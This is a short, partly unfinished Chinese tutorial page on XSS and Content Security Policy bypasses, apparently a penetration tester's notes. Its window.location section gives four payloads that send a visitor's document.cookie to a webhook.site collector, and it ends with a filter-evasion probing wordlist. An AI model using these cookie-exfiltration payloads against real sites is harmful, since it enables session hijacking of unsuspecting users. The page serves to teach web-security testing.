XSS绕过篇

施工中

CSP绕过

内容安全策略（Content-Security-Policy,简称CSP）

内容安全策略 （CSP） 被认为是一种浏览器技术，主要用于防御跨站点脚本 （XSS） 等攻击。内容安全策略为白名单策略，通过定义和详细说明浏览器可以安全地加载资源的路径和源，不加载除Content-Security-Policy以外的内容

使用 CSP的方式

1. 使用 Content-Security-Policy HTTP 头
2. 在html中添加入meta标签

<meta http-equiv="Content-Security-Policy" content="script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:">

详细介绍：Content-Security-Policy (CSP) - HTTP 中文开发手册 - 开发者手册 - 腾讯云开发者社区-腾讯云 (tencent.com)、Content-Security-Policy - HTTP | MDN (mozilla.org)

window.location 绕过

因为当今大部分网站的跳转功能都是由前端实现的，CSP一般不影响window.location对象的跳转到新的链接。所以，可以尝试使用跳转来绕过CSP获取数据

playroad类似于：

window.location="//webhook.site/xxxxxxxx/?cookie="+document.cookie;

window.location.href = "//webhook.site/xxxxxxxx/?cookie="+document.cookie;

window.location.assign("//webhook.site/xxxxxxxx/?cookie="+document.cookie);

window.location.replace("//webhook.site/xxxxxxxx/?cookie="+document.cookie);

Iframe标签绕过

Iframe标签简介

HTML 内联框架元素 (<iframe>) 能够将另一个 HTML 页面嵌入到当前页面中。比较特别的是，如果能将页面内中的

eval()绕过

XSS绕过总结

探测字典：

'
"
()
< >
<script> </script>
<Script> </Script>
<scrscriptipt> <SCRscriptIPT>
Onerror
onerror
javascript:
JavaScript:
<!-- -->
eval()
<a>
<img>
<iframe>
<form>
src
{}
/
+

文章引用

• 引用博主「J0k3r」的文章

  原文链接：https://j0k3r.top/2019/11/19/csp-bypass/